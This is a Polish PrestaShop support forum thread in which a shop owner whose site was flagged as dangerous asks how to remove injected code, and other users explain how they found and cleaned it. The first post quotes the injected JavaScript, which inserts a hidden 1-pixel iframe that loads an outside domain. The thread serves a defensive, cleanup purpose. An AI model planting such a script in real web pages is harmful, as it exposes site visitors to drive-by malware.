Polskie wsparcie PrestaShop
PrestaShop => Błędy => Wątek zaczęty przez: lawok w Listopad 17, 2012, 01:31:29 am
-
Witam.
Piszę na tym forum po raz pierwszy więc proszę o wyrozumiałość.
Jakiś czas temu założyłem sklep na prestashopie i wszystko ładnie sobie pokonfigurowałem i wszystko działało ładnie i pięknie.
Dzisiaj nagle Firefox informuje mnie że strona została zgłoszona jako witryna stanowiąca zagrożenie.
Narzędzia dla webmasterów Google pokazują mi że na 4 podstronach mam podobno złośliwe oprogramowanie typu Wstrzyknięcie kodu. Ten kod to:
<script type="text/javascript" language="javascript" >
(fu
nction () { var ncxta = document.createElement('iframe');
ncxta.src = 'http://prewhome.com/'; ncxta.style.positi
on = 'absolute'; ncxta.style.border = '0'; ncxta.style
.height = '1px'; ncxta.style.width = '1px'; ncxta.styl
e.left = '1px'; ncxta.style.top = '1px'; if (!document
.getElementById('ncxta')) { document.write('<div id=\
'ncxta\'></div>'); document.getElementById('ncxta').a
ppendChild(ncxta); }})();</script>
Wstrzyknięcie kodu
1 lub więcej
Ściągnąłem pliki z serwera za pomocą przeszukałem je na obecność słów np prewhome i nigdzie nie znajduje mi takie kawałka kodu?
Jak ten kod odnaleźć jak wyczyścić kod sklepu żeby znowu działał prawidłowo?
Proszę o wszelkie porady :-)
Link do sklepu: http://www.wkladkiortopedycznemedic.pl (http://www.wkladkiortopedycznemedic.pl)
-
Co to za pliki są ?
-
http://wkladkiortopedycznemedic.pl/pl/
http://wkladkiortopedycznemedic.pl/pl/15-allegro
http://wkladkiortopedycznemedic.pl/pl/wkladki-dla-dzieci/34-perfect-kid.html
http://wkladkiortopedycznemedic.pl/pl/43-simon-gel.html
Takie coś mi google pokazuje :-\
-
Sprawdź plik header.tpl, ew nadpisz z czystej instalacji.
-
raczej takie "wstrzykniecia" sa w szczegolnosci wrzucane w index.php albo ogolnie w pliki .php
najlepiej sciagnij caly sklep i przeszukaj nie tyle na obecnosc prewhome, bo link moze byc generowany z automatu ale na 'ncxta'
-
Dzięki sprawdzę te pliki.
Przeskanowałem też stronę Kasperskim i znalazło mi 32 pliki z trojanem zazwyczaj - pliki .js z katalogów js i jquery oraz dwa moduły które od razu wywaliłem bo bez nich też spokojnie mogę działać.
W tej chwili Kasperski już się nie burzy przy wejściu na sklep może idę w dobrą stronę :-)
-
Idąc tą drogą wykasuj całość katalogu js i wgraj nową.
-
Udało się po wymianie wszystkich plików .js na serwerze - google odblokowało stronę i zdjęło mnie z indeksu stron zakazanych :D
Teraz tylko naprawa tego co się skrzaczyło podczas nadpisywania niektórych plików hurtem i będzie dobrze (oby ;) )
-
przede wzsystkim zmien jeszcze haslo na jakies wiecej niz 10 znakow (litery male, duze oraz cyfry) do FTP i zoptymalizuj indexy oraz htaccess aby historia sie nie powtorzyla. bo jak wlamali sie raz to juz gdzies po systemach badwarowych maja cie na liscie, a takie rzeczy dzieja sie z automatu ;)
-
przede wzsystkim zmien jeszcze haslo na jakies wiecej niz 10 znakow (litery male, duze oraz cyfry) do FTP
Hasła już zmieniłem do ftp i nowy admin jest stary wyrzucony i nowe trudne hasło.
i zoptymalizuj indexy oraz htaccess aby historia sie nie powtorzyla. bo jak wlamali sie raz to juz gdzies po systemach badwarowych maja cie na liscie, a takie rzeczy dzieja sie z automatu ;)
A jeśli można prosić to poprosiłbym więcej jakiś pomocnych wskazówek - w sprawie optymalizacji indexów i htaccess. Dodam że hosting jest na ovh :-)
Z góry dzięki